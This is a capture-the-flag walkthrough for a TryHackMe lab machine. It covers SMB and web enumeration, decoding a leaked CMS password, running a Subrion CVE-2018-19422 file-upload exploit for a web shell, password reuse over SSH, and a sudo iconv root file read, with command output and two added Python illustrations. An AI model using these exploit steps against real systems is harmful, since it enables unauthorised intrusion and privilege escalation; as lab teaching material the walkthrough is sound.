Challenge Link - https://tryhackme.com/room/techsupp0rt1
Initial Enumeration and Web Shell
We start with an nmap scan of the default top 1000 TCP ports, with service/version detection (-sV) and the default script set (-sC), saving the output for later reference.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ nmap -sC -sV -oN nmap/initial 10.10.59.1
Nmap scan report for 10.10.59.1
Host is up (0.19s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_  256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time:
|   date: 2022-05-16T17:28:34
|_  start_date: N/A
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2022-05-21T22:58:36+05:30
|_clock-skew: mean: -1h49m59s, deviation: 3h10m29s, median: 0s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 16 22:58:43 2022 -- 1 IP address (1 host up) scanned in 47.35 seconds
We have an SSH server (OpenSSH 7.2p2) on port 22, Apache httpd 2.4.18 on port 80 and Samba 4.3.11 on ports 139 and 445. Two details from the host scripts are worth noting for later: the SMB service accepted a guest account, and message signing is not required.
Let's start with port 80. Nmap reports the stock "Apache2 Ubuntu Default Page", and opening it in the browser confirms there is nothing beyond the default page at the web root.
Next, we can run a gobuster scan to look for hidden files and directories.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ gobuster dir -u http://10.10.59.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.59.1
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wordpress            (Status: 301) [Size: 312] [--> http://10.10.59.1/wordpress/]
/test                 (Status: 301) [Size: 307] [--> http://10.10.59.1/test/]
===============================================================
Finished
===============================================================
We found two directories. I enumerated both, but neither contains anything useful at this stage; they are a rabbit hole, so don't spend time on them.
Next we enumerate SMB and check whether any share is readable or writable. The nmap host scripts already showed a guest account being accepted, so an anonymous share listing is worth trying first.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ smbclient -L 10.10.59.1
Password for [WORKGROUP\madhav]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        websvr          Disk
        IPC$            IPC       IPC Service (TechSupport server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP
Besides the default print$ and IPC$ shares there is a custom share named websvr. Let's try connecting to it.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ smbclient //10.10.59.1/websvr
Password for [WORKGROUP\madhav]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat May 29 12:47:38 2021
  ..                                  D        0  Sat May 29 12:33:47 2021
  enter.txt                           N      273  Sat May 29 12:47:38 2021

                8460484 blocks of size 1024. 5698836 blocks available
smb: \> get enter.txt
getting file \enter.txt of size 273 as enter.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit
We got a file named enter.txt. Inside the file there are some credentials (which are encoded) and a reference to a directory named
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ cat enter.txt
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->
First of all, we need to decode the password. The hint in the file ("cooked with magical formula") points at CyberChef: the value is encoded, not encrypted, and CyberChef's Magic operation recognises the encoding and decodes it directly.
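To make the "magic" step concrete, here is an added Python example (not code from this walkthrough or from CyberChef) that does what the Magic operation does for stacked textual encodings: it tries hex, Base32, Base64 and Base58 decoders in turn, accepts a layer only when the output is printable text, and repeats until nothing decodes further. The sample inputs are constructed inside the block by wrapping Scam2021 in a few encoding layers; the page does not state which encodings the real string uses, so the script makes no claim about that exact recipe. The Base58 codec is written inline because it is not in the standard library.

```python
"""Peel stacked text encodings the way CyberChef's Magic operation does.

Added illustration, not code from the walkthrough or from CyberChef.
Sample inputs are constructed in __main__ by encoding "Scam2021" with a
few layers; no claim is made about the recipe of the real ciphertext.
"""
import base64

# Bitcoin-style Base58 alphabet (no 0, O, I, l). Not in the stdlib, so inline.
B58_ALPHABET = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58encode(data: bytes) -> str:
    n = int.from_bytes(data, "big")
    digits = bytearray()
    while n:
        n, rem = divmod(n, 58)
        digits.append(B58_ALPHABET[rem])
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))  # each 0x00 -> '1'
    return (B58_ALPHABET[:1] * leading_zeros + bytes(reversed(digits))).decode()


def b58decode(text: str) -> bytes:
    n = 0
    for ch in text.encode():
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError("non-base58 character")
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    leading_ones = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_ones + body


ENCODERS = {
    "hex": lambda b: b.hex().encode(),
    "base32": base64.b32encode,
    "base64": base64.b64encode,
    "base58": lambda b: b58encode(b).encode(),
}

# Strictest alphabets first, so a looser decoder does not grab a stricter layer.
DECODERS = [
    ("hex", bytes.fromhex),
    ("base32", base64.b32decode),
    ("base64", lambda s: base64.b64decode(s, validate=True)),
    ("base58", b58decode),
]


def looks_like_text(data: bytes) -> bool:
    """Magic's core heuristic, simplified: every byte is printable ASCII."""
    return bool(data) and all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def encode_layers(plaintext: bytes, layers) -> str:
    """Apply encodings innermost-first (used here only to build sample inputs)."""
    data = plaintext
    for name in layers:
        data = ENCODERS[name](data)
    return data.decode("ascii")


def peel_layers(text: str, max_depth: int = 8):
    """Return (layers found outermost-first, recovered plaintext)."""
    layers = []
    current = text.strip()
    for _ in range(max_depth):
        for name, decode in DECODERS:
            try:
                out = decode(current)
            except ValueError:  # binascii.Error is a ValueError subclass
                continue
            if looks_like_text(out):
                layers.append(name)
                current = out.decode("ascii")
                break
        else:
            break  # no decoder produced text: this is the innermost layer
    return layers, current


if __name__ == "__main__":
    # Constructed samples: the same password under three different recipes.
    for recipe in (["base32", "base58"], ["hex", "base64"], ["base64", "base64"]):
        blob = encode_layers(b"Scam2021", recipe)
        print(f"{blob:40} -> {peel_layers(blob)}")
```

The printable-text test is what stops the loop at the right place: a Base64 decode of the final Scam2021 succeeds syntactically but yields non-printable bytes, so it is rejected and the plaintext is returned as-is. Magic uses richer scoring (language statistics, file-magic bytes), but the peel-and-check structure is the same.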
We got the password! Browsing to /subrion does not load properly, but /subrion/panel does: it serves the admin login page, and the credentials we recovered work there.
For those who don't know Subrion, it is an open-source CMS written in PHP on top of MySQL. Several public exploits exist for it, including one for the authenticated file upload vulnerability in Subrion 4.2.1 (CVE-2018-19422), which is the version the exploit below reports for this target.
We can use this exploit to get a web shell on the target: it logs in with the recovered credentials, fetches the CSRF token, uploads a randomly named .phar web shell and drops us into a command prompt running as www-data.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ python3 49876.py -u http://10.10.59.1/subrion/panel/ -l admin -p Scam2021
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://10.10.59.1/subrion/panel/
[+] Success!
[+] Got CSRF token: maQYr48N6TYYj96VUyXQnHJLa10YDXfBBE7C66Tk
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: gbbogvvwtgreihg
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://10.10.59.1/subrion/panel/uploads/gbbogvvwtgreihg.phar
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
You can also do this manually: upload a PHP reverse shell with a .phar extension through the panel, where it lands under /subrion/panel/uploads, start a listener, and then request the file in the browser to trigger the connection back. The .phar suffix is the whole trick: the upload filter does not reject it, but the web server still hands it to the PHP interpreter, which is exactly the bypass the exploit script automates.
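The following added Python example (not Subrion's code and not part of the original walkthrough) shows why an extension deny-list fails against a .phar upload and what a hardened handler does instead. The DENYLIST is a constructed stand-in for a naive upload filter, and PHP_HANDLER mirrors the FilesMatch pattern Debian/Ubuntu ship for the Apache PHP module; that this pattern is in effect on the target is an assumption, although the exploit output above shows .phar is indeed executed there.

```python
"""Extension deny-lists versus what Apache actually hands to PHP.

Added illustration; none of this is Subrion's code. DENYLIST is a
constructed stand-in for a naive upload filter. PHP_HANDLER mirrors the
FilesMatch pattern in Debian/Ubuntu's php*.conf for Apache (assumption
that the target uses that default).
"""
import re
import secrets
from typing import Optional

# Constructed: the kind of deny-list a naive upload handler might use.
DENYLIST = {"php", "php3", "php4", "php5", "phtml", "phps", "html", "js", "exe"}

# Apache default: these suffixes get SetHandler application/x-httpd-php.
# Note it is case-sensitive and anchored at the end of the filename.
PHP_HANDLER = re.compile(r".+\.ph(ar|p|tml)$")

# What a hardened handler accepts when uploads are meant to be images/docs.
ALLOWLIST = {"png", "jpg", "jpeg", "gif", "pdf"}


def extension(name: str) -> str:
    """Last suffix, lower-cased, as a typical filter compares it."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def denylist_allows(name: str) -> bool:
    """The vulnerable check: anything not explicitly listed goes through."""
    return extension(name) not in DENYLIST


def apache_executes_as_php(name: str) -> bool:
    """Would Apache run this file as PHP once it sits in a served directory?"""
    return PHP_HANDLER.match(name) is not None


def dangerous_names(candidates):
    """Names that survive the deny-list and are still executed: the bypasses."""
    return [n for n in candidates if denylist_allows(n) and apache_executes_as_php(n)]


def safe_store_name(name: str) -> Optional[str]:
    """Hardened version: allow-list the suffix and discard the client's name."""
    ext = extension(name)
    if ext not in ALLOWLIST:
        return None  # reject instead of trying to enumerate every bad suffix
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    probes = ["shell.php", "shell.phtml", "shell.phar", "shell.php.jpg", "avatar.png"]
    for n in probes:
        print(f"{n:14} deny-list passes: {denylist_allows(n)!s:5}  "
              f"Apache runs as PHP: {apache_executes_as_php(n)}")
    print("bypass candidates:", dangerous_names(probes))
    print("hardened handler:", {n: safe_store_name(n) for n in probes})
```

shell.php.jpg is the instructive negative case: it passes the deny-list but the anchored FilesMatch pattern does not execute it, whereas shell.phar passes the list and is executed. A deny-list can only be as complete as the author's knowledge of the server's handler configuration, which is why the hardened version inverts the logic and also throws away the client-supplied name.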
Now we have an initial shell on the target as www-data. The next task is to escalate privileges and get a root shell. I started by enumerating the web directories and found a password in the WordPress configuration file, wp-config.php:
$ cat /var/www/html/wordpress/wp-config.php
That password is reused for the local account scamsite (the username is listed in /etc/passwd), so we can log in over SSH with it.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ ssh scamsite@10.10.59.1
The authenticity of host '10.10.59.1 (10.10.59.1)' can't be established.
ED25519 key fingerprint is SHA256:J/HR9GKX4ReRvs4I9fnMwmJrOTL5B3skZ4owxwxWoyM.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.59.1' (ED25519) to the list of known hosts.
scamsite@10.10.59.1's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

120 packages can be updated.
88 updates are security updates.

Last login: Fri May 28 23:30:20 2021
scamsite@TechSupport:~$
Running sudo -l shows that scamsite can run /usr/bin/iconv as root without a password.
scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv
iconv converts text from one character encoding to another (see its man page). GTFOBins lists it as a file-read primitive: the input can be any path, so running it through sudo reads files as root, including the root flag. Converting from 8859_1 to 8859_1 is a no-op, so the contents come out unchanged. The same GTFOBins entry also documents a file write through the -o option, so a NOPASSWD sudo rule on iconv is really a root file read/write, not just a way to read one flag; for this room, reading the flag is enough.
We can do this with the following command:
scamsite@TechSupport:~$ sudo iconv -f 8859_1 -t 8859_1 "/root/root.txt"
**************************************** -
The challenge is now complete: we have read the root flag. Thanks for reading, and stay tuned for similar walkthroughs in the near future!
NOTE: The awesome artwork used in this article was created by Alfrey Davilla | vaneltia.